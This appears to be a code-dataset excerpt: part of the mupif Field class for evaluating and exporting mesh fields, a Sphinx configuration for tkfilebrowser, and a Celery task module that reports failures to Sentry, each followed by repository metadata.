debug: log.debug(icell.getVertices()) try: answer = icell.interpolate(position, [self.value[i.number] for i in icell.getVertices()]) except IndexError: log.error('Field::evaluate failed, inconsistent data at cell %d' % icell.label) raise return answer except ZeroDivisionError: print('ZeroDivisionError?') log.debug(icell.number) log.debug(position) icell.debug = 1 log.debug(icell.containsPoint(position), icell.glob2loc(position)) log.error('Field::evaluate - no source cell found for position %s' % str(position)) for icell in cells: log.debug(icell.number) log.debug(icell.containsPoint(position)) log.debug(icell.glob2loc(position)) else: # if (self.fieldType == FieldType.FT_vertexBased): # in case of cell based fields do compute average of cell values containing point # this typically happens when point is on the shared edge or vertex count = 0 for icell in cells: if icell.containsPoint(position): if debug: log.debug(icell.getVertices()) try: tmp = self.value[icell.number] if count == 0: answer = list(tmp) else: for i in answer: answer = [x+y for x in answer for y in tmp] count += 1 except IndexError: log.error('Field::evaluate failed, inconsistent data at cell %d' % icell.label) log.error(icell.getVertices()) raise # end loop over icells if count == 0: log.error('Field::evaluate - no source cell found for position %s', str(position)) # for icell in cells: # log.debug(icell.number, icell.containsPoint(position), icell.glob2loc(position)) else: answer = [x/count for x in answer] return answer else: # no source cell found log.error('Field::evaluate - no source cell found for position ' + str(position)) raise ValueError('Field::evaluate - no source cell found for position ' + str(position)) def getVertexValue(self, vertexID): """ Returns the value associated with a given vertex. :param int vertexID: Vertex identifier :return: The value :rtype: Physics.PhysicalQuantity """ if self.fieldType == FieldType.FT_vertexBased: return PhysicalQuantity(self.value[vertexID], self.unit) else: raise TypeError('Attempt to acces vertex value of cell based field, use evaluate instead') def getCellValue(self, cellID): """ Returns the value associated with a given cell. 
:param int cellID: Cell identifier :return: The value :rtype: Physics.PhysicalQuantity """ if self.fieldType == FieldType.FT_cellBased: return PhysicalQuantity(self.value[cellID], self.unit) else: raise TypeError('Attempt to acces cell value of vertex based field, use evaluate instead') def _giveValue(self, componentID): """ Returns the value associated with a given component (vertex or cell). Depreceated, use getVertexValue() or getCellValue() :param int componentID: An identifier of a component: vertexID or cellID :return: The value :rtype: Physics.PhysicalQuantity """ return PhysicalQuantity(self.value[componentID], self.unit) def giveValue(self, componentID): """ Returns the value associated with a given component (vertex or cell). :param int componentID: An identifier of a component: vertexID or cellID :return: The value :rtype: tuple """ return self.value[componentID] def setValue(self, componentID, value): """ Sets the value associated with a given component (vertex or cell). :param int componentID: An identifier of a component: vertexID or cellID :param tuple value: Value to be set for a given component, should have the same units as receiver .. Note:: If a mesh has mapping attached (a mesh view) then we have to remember value locally and record change. The source field values are updated after commit() method is invoked. """ self.value[componentID] = value def commit(self): """ Commits the recorded changes (via setValue method) to a primary field. """ def getObjectID(self): """ Returns field objectID. :return: Object's ID :rtype: int """ return self.objectID def getUnits(self): """ :return: Returns units of the receiver :rtype: Physics.PhysicalUnits """ return self.unit def merge(self, field): """ Merges the receiver with given field together. Both fields should be on different parts of the domain (can also overlap), but should refer to same underlying discretization, otherwise unpredictable results can occur. :param Field field: given field to merge with. """ # first merge meshes mesh = copy.deepcopy(self.mesh) mesh.merge(field.mesh) log.debug(mesh) # merge the field values # some type checking first if self.fieldType != field.fieldType: raise TypeError("Field::merge: fieldType of receiver and parameter is different") if self.fieldType == FieldType.FT_vertexBased: values = [0]*mesh.getNumberOfVertices() for v in range(self.mesh.getNumberOfVertices()): values[mesh.vertexLabel2Number(self.mesh.getVertex(v).label)] = self.value[v] for v in range(field.mesh.getNumberOfVertices()): values[mesh.vertexLabel2Number(field.mesh.getVertex(v).label)] = field.value[v] else: values = [0]*mesh.getNumberOfCells() for v in range(self.mesh.getNumberOfCells()): values[mesh.cellLabel2Number(self.mesh.giveCell(v).label)] = self.value[v] for v in range(field.mesh.getNumberOfCells()): values[mesh.cellLabel2Number(field.mesh.giveCell(v).label)] = field.value[v] self.mesh = mesh self.value = values def field2VTKData (self, name=None, lookupTable=None): """ Creates VTK representation of the receiver. Useful for visualization. Requires pyvtk module. 
:param str name: human-readable name of the field :param pyvtk.LookupTable lookupTable: color lookup table :return: Instance of pyvtk :rtype: pyvtk.VtkData """ import pyvtk if name is None: name = self.getFieldIDName() if lookupTable and not isinstance(lookupTable, pyvtk.LookupTable): log.info('ignoring lookupTable which is not a pyvtk.LookupTable instance.') lookupTable = None if lookupTable is None: lookupTable=pyvtk.LookupTable([(0, .231, .298, 1.0), (.4, .865, .865, 1.0), (.8, .706, .016, 1.0)], name='coolwarm') # Scalars use different name than 'coolwarm'. Then Paraview uses its own color mapping instead of taking # 'coolwarm' from *.vtk file. This prevents setting Paraview's color mapping. scalarsKw = dict(name=name, lookup_table='default') else: scalarsKw = dict(name=name, lookup_table=lookupTable.name) # see http://cens.ioc.ee/cgi-bin/cvsweb/python/pyvtk/examples/example1.py?rev=1.3 for an example vectorsKw = dict(name=name) # vectors don't have a lookup_table if self.fieldType == FieldType.FT_vertexBased: if self.getValueType() == ValueType.Scalar: return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.PointData(pyvtk.Scalars([val[0] for val in self.value], **scalarsKw), lookupTable), 'Unstructured Grid Example') elif self.getValueType() == ValueType.Vector: return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.PointData(pyvtk.Vectors(self.value, **vectorsKw), lookupTable), 'Unstructured Grid Example') elif self.getValueType() == ValueType.Tensor: return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.PointData(pyvtk.Tensors(self.getMartixForTensor(self.value), **vectorsKw), lookupTable), 'Unstructured Grid Example') else: if self.getValueType() == ValueType.Scalar: return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.CellData(pyvtk.Scalars([val[0] for val in self.value], **scalarsKw), lookupTable), 'Unstructured Grid Example') elif self.getValueType() == ValueType.Vector: return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.CellData(pyvtk.Vectors(self.value, **vectorsKw),lookupTable), 'Unstructured Grid Example') elif self.getValueType() == ValueType.Tensor: return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.CellData(pyvtk.Tensors(self.getMartixForTensor(self.value), **vectorsKw), lookupTable), 'Unstructured Grid Example') def getMartixForTensor(self, values): """ Reshape values to a list with 3x3 arrays. Usable for VTK export. :param list values: List containing tuples of 9 values, e.g. [(1,2,3,4,5,6,7,8,9), (1,2,3,4,5,6,7,8,9), ...] :return: List containing 3x3 matrices for each tensor :rtype: list """ tensor = [] for i in values: tensor.append(numpy.reshape(i, (3, 3))) return tensor def dumpToLocalFile(self, fileName, protocol=pickle.HIGHEST_PROTOCOL): """ Dump Field to a file using a Pickle serialization module. :param str fileName: File name :param int protocol: Used protocol - 0=ASCII, 1=old binary, 2=new binary """ pickle.dump(self, open(fileName, 'wb'), protocol) def field2Image2D(self, plane='xy', elevation=(-1.e-6, 1.e-6), numX=10, numY=20, interp='linear', fieldComponent=0, vertex=True, colorBar='horizontal', colorBarLegend='', barRange=(None, None), barFormatNum='%.3g', title='', xlabel='', ylabel='', fileName='', show=True, figsize=(8, 4), matPlotFig=None): """ Plots and/or saves 2D image using a matplotlib library. Works for structured and unstructured 2D/3D fields. 2D/3D fields need to define plane. This method gives only basic viewing options, for aesthetic and more elaborated output use e.g. 
VTK field export with postprocessors such as ParaView or Mayavi. Idea from https://docs.scipy.org/doc/scipy/reference/tutorial/interpolate.html#id1 :param str plane: what plane to extract from field, valid values are 'xy', 'xz', 'yz' :param tuple elevation: range of third coordinate. For example, in plane='xy' is grabs z coordinates in the range :param int numX: number of divisions on x graph axis :param int numY: number of divisions on y graph axis :param str interp: interpolation type when transferring to a grid. Valid values 'linear', 'nearest' or 'cubic' :param int fieldComponent: component of the field :param bool vertex: if vertices shoud be plot as points :param str colorBar: color bar details. Valid values '' for no colorbar, 'vertical' or 'horizontal' :param str colorBarLegend: Legend for color bar. If '', current field name and units are printed. None prints nothing. :param tuple barRange: min and max bar range. If barRange=('NaN','NaN'), it is adjusted automatically :param str barFormatNum: format of color bar numbers :param str title: title :param str xlabel: x axis label :param str ylabel: y axis label :param str fileName: if nonempty, a filename is written to the disk, usually png, pdf, ps, eps and svg are supported :param bool show: if the plot should be showed :param tuple figsize: size of canvas in inches. Affects only showing a figure. Image to a file adjust one side automatically. :param obj matPlotFig: False means plot window remains in separate thread, True waits until a plot window becomes closed :return: handle to matPlotFig :rtype: matPlotFig """ try: import numpy as np import math from scipy.interpolate import griddata import matplotlib matplotlib.use('TkAgg') # Qt4Agg gives an empty, black window import matplotlib.pyplot as plt except ImportError as e: log.error('Skipping field2Image2D due to missing modules: %s' % e) return None # raise if self.fieldType != FieldType.FT_vertexBased: raise APIError.APIError('Only FieldType.FT_vertexBased is now supported') mesh = self.getMesh() numVertices = mesh.getNumberOfVertices() indX = 0 indY = 0 elev = 0 if plane == 'xy': indX = 0 indY = 1 elev = 2 elif plane == 'xz': indX = 0 indY = 2 elev = 1 elif plane == 'yz': indX = 1 indY = 2 elev = 0 # find eligible vertex points and values vertexPoints = [] vertexValue = [] for i in range(0, numVertices): coords = mesh.getVertex(i).getCoordinates() # print(coords) value = self.giveValue(i)[fieldComponent] if elevation[1] > coords[elev] > elevation[0]: vertexPoints.append((coords[indX], coords[indY])) vertexValue.append(value) if len(vertexPoints) == 0: log.info('No valid vertex points found, putting zeros on domain 1 x 1') for i in range(5): vertexPoints.append((i % 2, i/4.)) vertexValue.append(0) # for i in range (0, len(vertexPoints)): # print (vertexPoints[i], vertexValue[i]) vertexPointsArr = np.array(vertexPoints) vertexValueArr = np.array(vertexValue) xMin = vertexPointsArr[:, 0].min() xMax = vertexPointsArr[:, 0].max() yMin = vertexPointsArr[:, 1].min() yMax = vertexPointsArr[:, 1].max() # print(xMin, xMax, yMin, yMax) grid_x, grid_y = np.mgrid[xMin:xMax:complex(0, numX), yMin:yMax:complex(0, numY)] grid_z1 = griddata(vertexPointsArr, vertexValueArr, (grid_x, grid_y), interp) # print (grid_z1.T) plt.ion() # ineractive mode if matPlotFig is None: matPlotFig = plt.figure(figsize=figsize) # plt.xlim(xMin, xMax) # plt.ylim(yMin, yMax) plt.clf() plt.axis((xMin, xMax, yMin, yMax)) image = plt.imshow(grid_z1.T, extent=(xMin, xMax, yMin, yMax), origin='lower', aspect='equal') # 
plt.margins(tight=True) # plt.tight_layout() # plt.margins(x=-0.3, y=-0.3) if colorBar: cbar = plt.colorbar(orientation=colorBar, format=barFormatNum) if colorBarLegend is not None: if colorBarLegend == '': colorBarLegend = self.getFieldIDName() + '_' + str(fieldComponent) if self.unit is not None: colorBarLegend = colorBarLegend + ' (' + self.unit.name() + ')' cbar.set_label(colorBarLegend, rotation=0 if colorBar == 'horizontal' else 90) if title: plt.title(title) if xlabel: plt.xlabel(xlabel) if ylabel: plt.ylabel(ylabel) if vertex == 1: plt.scatter(vertexPointsArr[:, 0], vertexPointsArr[:, 1], marker='o', c='b', s=5, zorder=10) # plt.axis('equal') # plt.gca().set_aspect('equal', adjustable='box-forced') if isinstance(barRange[0], float) or isinstance(barRange[0], int): image.set_clim(vmin=barRange[0], vmax=barRange[1]) if fileName: plt.savefig(fileName, bbox_inches='tight') if show: matPlotFig.canvas.draw() # plt.ioff() # plt.show(block=True) return matPlotFig def field2Image2DBlock(self): """ Block an open window from matPlotLib. Waits until closed. """ import matplotlib.pyplot as plt plt.ioff() plt.show(block=True) def toHdf5(self, fileName, group='component1/part1'): """ Dump field to HDF5, in a simple format suitable for interoperability (TODO: document). :param str fileName: HDF5 file :param str group: HDF5 group the data will be saved under. The HDF hierarchy is like this:: group | +--- mesh_01 {hash=25aa0aa04457} | +--- [vertex_coords] | +--- [cell_types] | \--- [cell_vertices] +--- mesh_02 {hash=17809e2b86ea} | +--- [vertex_coords] | +--- [cell_types] | \--- [cell_vertices] +--- ... +--- field_01 | +--- -> mesh_01 | \--- [vertex_values] +--- field_02 | +--- -> mesh_01 | \--- [vertex_values] +--- field_03 | +--- -> mesh_02 | \--- [cell_values] \--- ... where ``plain`` names are HDF (sub)groups, ``[bracketed]`` names are datasets, ``{name=value}`` are HDF attributes, ``->`` prefix indicated HDF5 hardlink (transparent to the user); numerical suffixes (``_01``, ...) are auto-allocated. Mesh objects are hardlinked using HDF5 hardlinks if an identical mesh is already stored in the group, based on hexdigest of its full data. .. note:: This method has not been tested yet. The format is subject to future changes. """ import h5py hdf = h5py.File(fileName, 'a', libver='latest') if group not in hdf: gg = hdf.create_group(group) else: gg = hdf[group] # raise IOError('Path "%s" is already used in "%s".'%(path,fileName)) def lowestUnused(trsf, predicate, start=1): """ Find the lowest unused index, where *predicate* is used to test for existence, and *trsf* transforms integer (starting at *start* and incremented until unused value is found) to whatever predicate accepts as argument. Lowest transformed value is returned. 
""" import itertools for i in itertools.count(start=start): t = trsf(i) if not predicate(t): return t # save mesh (not saved if there already) newgrp = lowestUnused(trsf=lambda i: 'mesh_%02d' % i, predicate=lambda t: t in gg) mh5 = self.getMesh().asHdf5Object(parentgroup=gg, newgroup=newgrp) if self.value: fieldGrp = hdf.create_group(lowestUnused(trsf=lambda i, group=group: group+'/field_%02d' % i, predicate=lambda t: t in hdf)) fieldGrp['mesh'] = mh5 fieldGrp.attrs['fieldID'] = self.fieldID fieldGrp.attrs['valueType'] = self.valueType # string/bytes may not contain NULL when stored as string in HDF5 # see http://docs.h5py.org/en/2.3/strings.html # that's why we cast to opaque type "void" and uncast using tostring before unpickling fieldGrp.attrs['units'] = numpy.void(pickle.dumps(self.unit)) fieldGrp.attrs['time'] = numpy.void(pickle.dumps(self.time)) # fieldGrp.attrs['time']=self.time.getValue() if self.fieldType == FieldType.FT_vertexBased: val = numpy.empty(shape=(self.getMesh().getNumberOfVertices(), self.getRecordSize()), dtype=numpy.float) for vert in range(self.getMesh().getNumberOfVertices()): val[vert] = self.getVertexValue(vert).getValue() fieldGrp['vertex_values'] = val elif self.fieldType == FieldType.FT_cellBased: # raise NotImplementedError("Saving cell-based fields to HDF5 is not yet implemented.") val = numpy.empty(shape=(self.getMesh().getNumberOfCells(), self.getRecordSize()), dtype=numpy.float) for cell in range(self.getMesh().getNumberOfCells()): val[cell] = self.getCellValue(cell) fieldGrp['cell_values'] = val else: raise RuntimeError("Unknown fieldType %d." % self.fieldType) @staticmethod def makeFromHdf5(fileName, group='component1/part1'): """ Restore Fields from HDF5 file. :param str fileName: HDF5 file :param str group: HDF5 group the data will be read from (IOError is raised if the group does not exist). :return: list of new :obj:`Field` instances :rtype: [Field,Field,...] .. note:: This method has not been tested yet. """ import h5py hdf = h5py.File(fileName, 'r', libver='latest') grp = hdf[group] # load mesh and field data from HDF5 meshObjs = [obj for name, obj in grp.items() if name.startswith('mesh_')] fieldObjs = [obj for name, obj in grp.items() if name.startswith('field_')] # construct all meshes as mupif objects meshes = [Mesh.Mesh.makeFromHdf5Object(meshObj) for meshObj in meshObjs] # construct all fields as mupif objects ret = [] for f in fieldObjs: if 'vertex_values' in f: fieldType, values = FieldType.FT_vertexBased, f['vertex_values'] elif 'cell_values' in f: fieldType, values = FieldType.FT_cellBased, f['cell_values'] else: ValueError("HDF5/mupif format error: unable to determine field type.") fieldID, valueType, units, time = FieldID(f.attrs['fieldID']), f.attrs['valueType'], f.attrs['units'].tostring(), f.attrs['time'].tostring() if units == '': units = None # special case, handled at saving time else: units = pickle.loads(units) if time == '': time = None # special case, handled at saving time else: time = pickle.loads(time) meshIndex = meshObjs.index(f['mesh']) # find which mesh object this field refers to ret.append(Field(mesh=meshes[meshIndex], fieldID=fieldID, units=units, time=time, valueType=valueType, values=values, fieldType=fieldType)) return ret def toVTK2(self, fileName, format='ascii'): """ Save the instance as Unstructured Grid in VTK2 format (``.vtk``). 
:param str fileName: where to save :param str format: one of ``ascii`` or ``binary`` """ self.field2VTKData().tofile(filename=fileName, format=format) @staticmethod def makeFromVTK2(fileName, unit, time=0, skip=['coolwarm']): """ Return fields stored in *fileName* in the VTK2 (``.vtk``) format. :param str fileName: filename to load from :param PhysicalUnit unit: physical unit of filed values :param float time: time value for created fields (time is not saved in VTK2, thus cannot be recovered) :param [string,] skip: file names to be skipped when reading the input file; the default value skips the default coolwarm colormap. :returns: one field from VTK :rtype: Field """ import pyvtk from .dataID import FieldID if not fileName.endswith('.vtk'): log.warning('Field.makeFromVTK2: fileName should end with .vtk, you may get in trouble (proceeding).') ret = [] try: data = pyvtk.VtkData(fileName) # this is where reading the file happens (inside pyvtk) except NotImplementedError: log.info('pyvtk fails to open (binary?) file "%s", trying through vtk.vtkGenericDataReader.' % fileName) return Field.makeFromVTK3(fileName, time=time, units=unit, forceVersion2=True) ugr = data.structure if not isinstance(ugr, pyvtk.UnstructuredGrid): raise NotImplementedError( "grid type %s is not handled by mupif (only UnstructuredGrid is)." % ugr.__class__.__name__) mesh = Mesh.UnstructuredMesh.makeFromPyvtkUnstructuredGrid(ugr) # get cell and point data pd, cd = data.point_data.data, data.cell_data.data for dd, fieldType in (pd, FieldType.FT_vertexBased), (cd, FieldType.FT_cellBased): for d in dd: # will raise KeyError if fieldID with that name is not defined if d.name in skip: continue fid = FieldID[d.name] # determine the number of components using the expected number of values from the mesh expectedNumVal = (mesh.getNumberOfVertices() if fieldType == FieldType.FT_vertexBased else mesh.getNumberOfCells()) nc = len(d.scalars)//expectedNumVal valueType = ValueType.fromNumberOfComponents(nc) values = [d.scalars[i*nc:i*nc+nc] for i in range(len(d.scalars))] ret.append(Field( mesh=mesh, fieldID=fid, units=unit, # not stored at all time=time, # not stored either, set by caller valueType=valueType, values=values, fieldType=fieldType )) return ret def toVTK3(self, fileName, **kw): """ Save the instance as Unstructured Grid in VTK3 format (``.vtu``). This is a simple proxy for calling :obj:`manyToVTK3` with the instance as the only field to be saved. If multiple fields with identical mesh are to be saved in VTK3, use :obj:`manyToVTK3` directly. :param fileName: output file name :param ``**kw``: passed to :obj:`manyToVTK3` """ return self.manyToVTK3([self], fileName, **kw) @staticmethod def manyToVTK3(fields, fileName, ascii=False, compress=True): """ Save all fields passed as argument into VTK3 Unstructured Grid file (``*.vtu``). All *fields* must be defined on the same mesh object; exception will be raised if this is not the case. 
:param list of Field fields: :param fileName: output file name :param bool ascii: write numbers are ASCII in the XML-based VTU file (rather than base64-encoded binary in XML) :param bool compress: apply compression to the data """ import vtk if not fields: raise ValueError('At least one field must be passed.') # check if all fields are defined on the same mesh if len(set([f.mesh for f in fields])) != 1: raise RuntimeError( 'Not all fields are sharing the same Mesh object (and could not be saved to a single .vtu file') # convert mesh to VTK UnstructuredGrid mesh = fields[0].getMesh() vtkgrid = mesh.asVtkUnstructuredGrid() # add fields as arrays for f in fields: arr = vtk.vtkDoubleArray() arr.SetNumberOfComponents(f.getRecordSize()) arr.SetName(f.getFieldIDName()) assert f.getFieldType() in (FieldType.FT_vertexBased, FieldType.FT_cellBased) # other future types not handled if f.getFieldType() == FieldType.FT_vertexBased: nn = mesh.getNumberOfVertices() else: nn = mesh.getNumberOfCells() arr.SetNumberOfValues(nn) for i in range(nn): arr.SetTuple(i, f.giveValue(i)) if f.getFieldType() == FieldType.FT_vertexBased: vtkgrid.GetPointData().AddArray(arr) else: vtkgrid.GetCellData().AddArray(arr) # write the unstructured grid to file writer = vtk.vtkXMLUnstructuredGridWriter() if compress: writer.SetCompressor(vtk.vtkZLibDataCompressor()) if ascii: writer.SetDataModeToAscii() writer.SetFileName(fileName) # change between VTK5 and VTK6 if vtk.vtkVersion().GetVTKMajorVersion() == 6: writer.SetInputData(vtkgrid) else: writer.SetInputData(vtkgrid) writer.Write() # finito @staticmethod def makeFromVTK3(fileName, units, time=0, forceVersion2=False): """ Create fields from a VTK unstructured grid file (``.vtu``, format version 3, or ``.vtp`` with *forceVersion2*); the mesh is shared between fields. ``vtk.vtkXMLGenericDataObjectReader`` is used to open the file (unless *forceVersion2* is set), but it is checked that contained dataset is a ``vtk.vtkUnstructuredGrid`` and an error is raised if not. .. note:: Units are not supported when loading from VTK, all fields will have ``None`` unit assigned. :param str fileName: VTK (``*.vtu``) file :param PhysicalUnit units: units of read values :param float time: time value for created fields (time is not saved in VTK3, thus cannot be recovered) :param bool forceVersion2: if ``True``, ``vtk.vtkGenericDataObjectReader`` (for VTK version 2) will be used to open the file, isntead of ``vtk.vtkXMLGenericDataObjectReader``; this also supposes *fileName* ends with ``.vtk`` (not checked, but may cause an error). :return: list of new :obj:`Field` instances :rtype: [Field,Field,...] 
""" import vtk from .dataID import FieldID # rr=vtk.vtkXMLUnstructuredGridReader() if forceVersion2 or fileName.endswith('.vtk'): rr = vtk.vtkGenericDataObjectReader() else: rr = vtk.vtkXMLGenericDataObjectReader() rr.SetFileName(fileName) rr.Update() ugrid = rr.GetOutput() if not isinstance(ugrid, vtk.vtkUnstructuredGrid): raise RuntimeError("vtkDataObject read from '%s' must be a vtkUnstructuredGrid (not a %s)" % ( fileName, ugrid.__class__.__name__)) # import sys # sys.stderr.write(str((ugrid,ugrid.__class__,vtk.vtkUnstructuredGrid))) # make mesh -- implemented separately mesh = Mesh.UnstructuredMesh.makeFromVtkUnstructuredGrid(ugrid) # fields which will be returned ret = [] # get cell and point data cd, pd = ugrid.GetCellData(), ugrid.GetPointData() for data, fieldType in (pd, FieldType.FT_vertexBased), (cd, FieldType.FT_cellBased): for idata in range(data.GetNumberOfArrays()): aname, arr = pd.GetArrayName(idata), pd.GetArray(idata) nt = arr.GetNumberOfTuples() if nt == 0: raise RuntimeError("Zero values in field '%s', unable to determine value type." % aname) t0 = arr.GetTuple(0) valueType = ValueType.fromNumberOfComponents(len(arr.GetTuple(0))) # this will raise KeyError if fieldID with that name not defined fid = FieldID[aname] # get actual values as tuples values = [arr.GetTuple(t) for t in range(nt)] ret.append(Field( mesh=mesh, fieldID=fid, units=units, # not stored at all time=time, # not stored either, set by caller valueType=valueType, values=values, fieldType=fieldType )) return ret def _sum(self, other, sign1, sign2): """ Should return a new instance. As deep copy is expensive, this operation should be avoided. Better to modify the field values. """ raise TypeError('Not supported') def inUnitsOf(self, *units): """ Should return a new instance. As deep copy is expensive, this operation should be avoided. Better to use convertToUnits method performing in place conversion. """ raise TypeError('Not supported') # def __deepcopy__(self, memo): # """ Deepcopy operatin modified not to include attributes starting with underscore. # These are supposed to be the ones valid only to s specific copy of the receiver. # An example of these attributes are _PyroURI (injected by Application), # where _PyroURI contains the URI of specific object, the copy should receive # its own URI # """ # cls = self.__class__ # dpcpy = cls.__new__(cls) # # memo[id(self)] = dpcpy # for attr in dir(self): # if not attr.startswith('_'): # value = getattr(self, attr) # setattr(dpcpy, attr, copy.deepcopy(value, memo)) # return dpcpy
lgpl-3.0
7,138,186,339,437,092,000
43.094008
381
0.597896
false
4.202324
false
false
false
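The Field methods in the record above cover both VTK generations: pyvtk for the legacy .vtk format and the vtk module for .vtu. A minimal usage sketch, assuming Field is the class defined in that file, f is an existing Field instance, and the file names are illustrative:

# Hedged sketch only: `f` is assumed to be an existing mupif Field instance,
# the file names are made up, and passing units=None/unit=None is an assumption
# (units are not stored in VTK files according to the docstrings above).
Field.manyToVTK3([f], 'fields.vtu', ascii=True, compress=False)      # write VTK3 (.vtu)
loaded_v3 = Field.makeFromVTK3('fields.vtu', units=None, time=0.0)   # read the .vtu back
loaded_v2 = Field.makeFromVTK2('fields.vtk', unit=None, time=0.0)    # legacy .vtk route via pyvtk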
j4321/tkFileBrowser
docs/conf.py
1
5256
# -*- coding: utf-8 -*- # # Configuration file for the Sphinx documentation builder. # # This file does only contain a selection of the most common options. For a # full list see the documentation: # http://www.sphinx-doc.org/en/master/config # -- Path setup -------------------------------------------------------------- # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # import os import sys sys.path.insert(0, os.path.abspath('..')) # -- Project information ----------------------------------------------------- project = 'tkfilebrowser' copyright = '2018, Juliette Monsel' author = 'Juliette Monsel' # The short X.Y version version = '' # The full version, including alpha/beta/rc tags release = '2.2.5' # -- General configuration --------------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. # # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ 'sphinx.ext.autodoc', 'sphinx.ext.viewcode', ] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # # source_suffix = ['.rst', '.md'] source_suffix = '.rst' # The master toctree document. master_doc = 'index' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This pattern also affects html_static_path and html_extra_path . exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'tango' # -- Options for HTML output ------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = 'sphinx_rtd_theme' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. # # html_theme_options = {} # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Custom sidebar templates, must be a dictionary that maps document names # to template names. # # The default sidebars (for documents that don't match any pattern) are # defined by theme itself. Builtin themes are using these templates by # default: ``['localtoc.html', 'relations.html', 'sourcelink.html', # 'searchbox.html']``. # # html_sidebars = {} # -- Options for HTMLHelp output --------------------------------------------- # Output file base name for HTML help builder. htmlhelp_basename = 'tkfilebrowserdoc' # -- Options for LaTeX output ------------------------------------------------ latex_elements = { # The paper size ('letterpaper' or 'a4paper'). 
# # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). # # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. # # 'preamble': '', # Latex figure (float) alignment # # 'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'tkfilebrowser.tex', 'tkfilebrowser Documentation', 'Juliette Monsel', 'manual'), ] # -- Options for manual page output ------------------------------------------ # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'tkfilebrowser', 'tkfilebrowser Documentation', [author], 1) ] # -- Options for Texinfo output ---------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'tkfilebrowser', 'tkfilebrowser Documentation', author, 'tkfilebrowser', 'One line description of project.', 'Miscellaneous'), ] # -- Options for Epub output ------------------------------------------------- # Bibliographic Dublin Core info. epub_title = project # The unique identifier of the text. This can be a ISBN number # or the project homepage. # # epub_identifier = '' # A unique identification for the text. # # epub_uid = '' # A list of files that should not be packed into the epub file. epub_exclude_files = ['search.html']
gpl-3.0
8,686,003,906,744,522,000
29.034286
79
0.649543
false
3.975794
true
false
false
unisport/thumblr
thumblr/tasks.py
1
1681
from django.conf import settings
from celery import Celery, Task
from raven import Client

import usecases

client = Client(settings.SENTRY_DSN)

celery = Celery('tasks')
celery.conf.update(
    AWS_ACCESS_KEY_ID=settings.AWS_ACCESS_KEY_ID,
    AWS_SECRET_ACCESS_KEY=settings.AWS_SECRET_ACCESS_KEY,
    CELERY_TASK_SERIALIZER='json',
    CELERY_ACCEPT_CONTENT=['json'],
    CELERY_RESULT_SERIALIZER='json',
    BROKER_URL="sqs://%s:%s@" % (settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_ACCESS_KEY),
    CELERY_RESULT_BACKEND="redis",
    CELERY_TIMEZONE='Europe/Copenhagen',
    BROKER_TRANSPORT_OPTIONS={'region': 'eu-west-1',
                              'polling_interval': 0.3,
                              'visibility_timeout': 3600,
                              'queue_name_prefix': 'catalog_products_'},
)


class ImagesCallbackTask(Task):
    """
    Generic subclass for Product Image Processing tasks,
    so that in case of failure a notification is sent to Sentry.
    """
    # def on_success(self, retval, task_id, args, kwargs):
    #     pass

    def on_failure(self, exc, task_id, args, kwargs, einfo):
        # client.captureMessage('Task "%s" has failed miserably.' % task_id)
        client.capture('raven.events.Message',
                       message='Task "%s" has failed miserably.' % task_id,
                       data={},
                       extra={'exc': exc,
                              'Task ID': task_id,
                              'Args': args,
                              'Kwargs': kwargs,
                              'einfo': einfo
                              }
                       )


usecases.add_image = celery.task(usecases.add_image)
mit
-463,160,966,042,746,240
33.326531
100
0.558001
false
3.803167
false
false
false
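The record above registers a plain function as a Celery task and provides ImagesCallbackTask so failures are pushed to Sentry. A hedged sketch of attaching that base class to a task of your own; the task name, body, and arguments are made up for illustration:

# Hypothetical task using the ImagesCallbackTask base defined above; raising
# inside the body triggers its on_failure hook and reports to Sentry.
@celery.task(base=ImagesCallbackTask, bind=True)
def resize_image(self, image_id, width, height):
    ...  # real image processing would go here
    return {'image_id': image_id, 'size': (width, height)}

# Queue it asynchronously (needs the SQS broker configured above to be reachable):
resize_image.delay(42, 800, 600)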
guaka/trust-metrics
trustlet/pymmetry/file_certs.py
1
9725
